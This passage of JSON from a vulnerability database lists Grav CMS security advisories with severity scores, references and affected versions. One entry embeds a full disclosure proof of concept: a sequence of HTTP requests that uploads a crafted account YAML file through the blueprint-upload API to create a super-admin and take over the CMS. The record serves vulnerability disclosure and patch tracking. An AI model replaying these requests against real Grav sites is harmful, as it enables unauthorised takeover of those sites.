"https://github.com/advisories/GHSA-8535-hvm8-2hmv", "reference_id": "GHSA-8535-hvm8-2hmv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8535-hvm8-2hmv" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv", "reference_id": "GHSA-8535-hvm8-2hmv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:06:52Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-8535-hvm8-2hmv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66298", "GHSA-8535-hvm8-2hmv" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9tu1-4n1t-6bgv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49328?format=api", "vulnerability_id": "VCID-a375-aqzf-r7gw", "summary": "Grav CMS is vulnerable to Cross Site Scripting (XSS) in the page editor\nGrav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65186", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10199", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65186" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65186", "reference_id": "CVE-2025-65186", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65186" }, { "reference_url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf", "reference_id": "CVE-2025-65186.PDF", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T19:31:02Z/" } ], "url": "https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf" }, { "reference_url": "https://github.com/advisories/GHSA-cchq-397m-q2qm", "reference_id": "GHSA-cchq-397m-q2qm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cchq-397m-q2qm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/907173?format=api", "purl": "pkg:composer/getgrav/grav@1.7.49.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.49.1" } ], "aliases": [ "CVE-2025-65186", "GHSA-cchq-397m-q2qm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a375-aqzf-r7gw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49326?format=api", "vulnerability_id": "VCID-a8df-4jgt-gba4", "summary": "Grav vulnerable to Path Traversal allowing server files backup\n```\nA path traversal vulnerability has been identified in Grav CMS, versions 1.7.49.5 , allowing authenticated attackers\nwith administrative privileges to read arbitrary files on the underlying server filesystem. This vulnerability arises due\nto insufficient input sanitization in the backup tool, where user-supplied paths are not properly restricted, enabling\naccess to files outside the intended webroot directory. The impact of this vulnerability depends on the privileges of\nthe user account running the application.\n```", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66302", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00064", "scoring_system": "epss", "scoring_elements": "0.20209", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66302" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/" } ], "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66302", "reference_id": "CVE-2025-66302", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66302" }, { "reference_url": "https://github.com/advisories/GHSA-j422-qmxp-hv94", "reference_id": "GHSA-j422-qmxp-hv94", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j422-qmxp-hv94" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94", "reference_id": "GHSA-j422-qmxp-hv94", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:11:05Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j422-qmxp-hv94" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66302", "GHSA-j422-qmxp-hv94" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a8df-4jgt-gba4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47204?format=api", "vulnerability_id": "VCID-a8y8-y4zt-zqbv", "summary": "Remote Code Execution by uploading a phar file using frontmatter\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27923", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05118", "scoring_system": "epss", "scoring_elements": "0.90029", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27923" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/" } ], "url": "https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27923", "reference_id": "CVE-2024-27923", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27923" }, { "reference_url": "https://github.com/advisories/GHSA-f6g2-h7qv-3m5v", "reference_id": "GHSA-f6g2-h7qv-3m5v", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f6g2-h7qv-3m5v" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v", "reference_id": "GHSA-f6g2-h7qv-3m5v", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-08-02T18:34:03Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/69258?format=api", "purl": "pkg:composer/getgrav/grav@1.7.43", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1ps5-3k43-p3fa" }, { "vulnerability": "VCID-4a2z-37a3-2qaw" }, { "vulnerability": "VCID-5kr2-3ywy-9kcn" }, { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-7jaz-7xjc-kka1" }, { "vulnerability": "VCID-9j1y-z47y-xudz" }, { "vulnerability": "VCID-9tu1-4n1t-6bgv" }, { "vulnerability": "VCID-a375-aqzf-r7gw" }, { "vulnerability": "VCID-a8df-4jgt-gba4" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-abwg-zvc9-w7dq" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-bafn-ne38-nucy" }, { "vulnerability": "VCID-bhhz-z132-zkhb" }, { "vulnerability": "VCID-bwvg-jg4z-nyhp" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-egxp-rctq-xyh8" }, { "vulnerability": "VCID-esjd-ztwe-c3h1" }, { "vulnerability": "VCID-f3wx-5ayr-tqga" }, { "vulnerability": "VCID-fmmu-r77k-c7g2" }, { "vulnerability": "VCID-k8fd-bqpk-2qg8" }, { "vulnerability": "VCID-kbnn-6uws-kqh9" }, { "vulnerability": "VCID-p1u7-9mk4-fkcr" }, { "vulnerability": "VCID-p5d4-8rvg-uqem" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-rj4b-8dyu-juen" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-ss11-shq5-qqae" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-v8u1-nbxw-a7fr" }, { "vulnerability": "VCID-v9n7-vann-6fa5" }, { "vulnerability": "VCID-vm87-35gf-eyft" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" }, { "vulnerability": "VCID-y7vc-cx37-7ubs" }, { "vulnerability": "VCID-yh73-zyju-vqge" }, { "vulnerability": "VCID-ymnw-h6as-fbe5" }, { "vulnerability": "VCID-zg5t-uqx2-87fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.43" } ], "aliases": [ "CVE-2024-27923", "GHSA-f6g2-h7qv-3m5v" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a8y8-y4zt-zqbv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95897?format=api", "vulnerability_id": "VCID-aa7e-n85b-wbdm", "summary": "Low-privileged Grav API users can create super-admin accounts via blueprint-upload\n## Summary\n\nIn Grav `2.0.0-beta.2`, a low-privileged authenticated API user with `api.media.write` can abuse `/api/v1/blueprint-upload` to write an arbitrary YAML file into `user/accounts/`, then log in as the newly created account with `api.super` privileges.\n\nThis results in full administrative compromise of the Grav API.\n\n## Details\n\nThe vulnerability is located in the API plugin's blueprint upload flow:\n\n- `user/plugins/api/classes/Api/ApiRouter.php:261`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308`\n- `user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417`\n- `user/plugins/api/classes/Api/Controllers/AuthController.php:41-55`\n\nThe issue exists because `/api/v1/blueprint-upload` accepts caller-controlled `destination` and `scope` values and uses them to resolve the final filesystem write target.\n\nWhen the request uses:\n\n- `destination=self@:`\n- `scope=users/anything`\n\nThe server resolves the write target to the shared account directory:\n\n```text\nuser/accounts/\n```\n\nThe upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext `password:` field on first login, an attacker can create a fully functional administrator account with `api.super`.\n\nThe required attacker privilege is low:\n\n```yaml\naccess:\n api:\n access: true\n media:\n write: true\n```\n\n## PoC\n\n### Step 1: Authenticate as the low-privileged API user\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: application/json\nConnection: close\n\n{\"username\":\"uploader\",\"password\":\"Upload123A\"}\n```\n\nExtract:\n\n```text\nUPLOADER_TOKEN = <access_token from response>\n```\n\nAttachment:\n\n<img width=\"1480\" height=\"825\" alt=\"login-uploader\" src=\"https://github.com/user-attachments/assets/5aeda840-4a37-4365-8e46-caec88066541\" />\n\n### Step 2: Upload a malicious account YAML file\n\n```http\nPOST /api/v1/blueprint-upload HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: <UPLOADER_TOKEN>\nContent-Type: multipart/form-data; boundary=----CodexBoundaryF01\nConnection: close\n\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"destination\"\n\nself@:\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"scope\"\n\nusers/anything\n------CodexBoundaryF01\nContent-Disposition: form-data; name=\"file\"; filename=\"pwned.yaml\"\nContent-Type: text/yaml\n\nemail: attacker@example.com\nfullname: attacker\ntitle: Site Administrator\nstate: enabled\npassword: Passw0rd!123\naccess:\n site:\n login: true\n api:\n super: true\n------CodexBoundaryF01--\n```\n\nExpected result:\n\n```json\n{\n \"data\": [\n {\n \"name\": \"pwned.yaml\",\n \"path\": \"user/accounts/pwned.yaml\"\n }\n ]\n}\n```\n\nAttachment:\n\n<img width=\"1484\" height=\"797\" alt=\"upload\" src=\"https://github.com/user-attachments/assets/0b24c03f-cac5-4b4d-840c-52ac0840969f\" />\n\n### Step 3: Log in as the newly created account\n\n```http\nPOST /api/v1/auth/token HTTP/1.1\nHost: 127.0.0.1:8123\nContent-Type: application/json\nConnection: close\n\n{\"username\":\"pwned\",\"password\":\"Passw0rd!123\"}\n```\n\nExpected result:\n\n```json\n{\n \"data\": {\n \"user\": {\n \"username\": \"pwned\",\n \"super_admin\": true\n }\n }\n}\n```\n\nAttachment:\n\n<img width=\"1494\" height=\"830\" alt=\"pwned-login\" src=\"https://github.com/user-attachments/assets/7a1ab7fc-d3fb-4077-9b61-09cd947241fe\" />\n\n### Step 4: Verify privileged API access\n\n```http\nGET /api/v1/system/info HTTP/1.1\nHost: 127.0.0.1:8123\nX-API-Token: <PWNED_TOKEN>\nConnection: close\n```\n\nExpected result:\n\nThe request succeeds and returns system-level information.\n\nAttachment:\n\n<img width=\"1480\" height=\"831\" alt=\"system-info\" src=\"https://github.com/user-attachments/assets/31677d61-3dbd-4ea6-9fbe-80799a628cc2\" />\n\n## Impact\n\nThis is an authenticated vertical privilege-escalation vulnerability.\n\nAny API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once `api.super` access is obtained, the attacker gains full control over the CMS management API and can:\n\n- modify content\n- alter configuration\n- manage users\n- install or update plugins/themes\n- access system-level administration features\n\nIn a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.\n\nThis issue was reproduced locally:\n\n- the upload response returned `user/accounts/pwned.yaml`\n- logging in as `pwned` succeeded\n- the new account had `super_admin = true`\n- privileged endpoints such as `/api/v1/system/info` were accessible", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42844", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00046", "scoring_system": "epss", "scoring_elements": "0.14661", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42844" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T14:28:07Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42844", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42844" }, { "reference_url": "https://github.com/advisories/GHSA-6xx2-m8wv-756h", "reference_id": "GHSA-6xx2-m8wv-756h", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-6xx2-m8wv-756h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/120031?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.4" } ], "aliases": [ "CVE-2026-42844", "GHSA-6xx2-m8wv-756h" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aa7e-n85b-wbdm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49298?format=api", "vulnerability_id": "VCID-abwg-zvc9-w7dq", "summary": "Grav is vulnerable to Arbitrary File Read\n- A low privilege user account with page editing privilege can read any server files using \"Frontmatter\" form.\n- This includes Grav user account files - /grav/user/accounts/*.yaml. This file stores hashed user password, 2FA secret, and the password reset token.\n- This can allow an adversary to compromise any registered account by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66300", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00073", "scoring_system": "epss", "scoring_elements": "0.22416", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66300" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/" } ], "url": "https://github.com/getgrav/grav/commit/ed640a13143c4177af013cf001969ed2c5e197ee" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66300", "reference_id": "CVE-2025-66300", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66300" }, { "reference_url": "https://github.com/advisories/GHSA-p4ww-mcp9-j6f2", "reference_id": "GHSA-p4ww-mcp9-j6f2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p4ww-mcp9-j6f2" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2", "reference_id": "GHSA-p4ww-mcp9-j6f2", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:08:33Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-p4ww-mcp9-j6f2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": 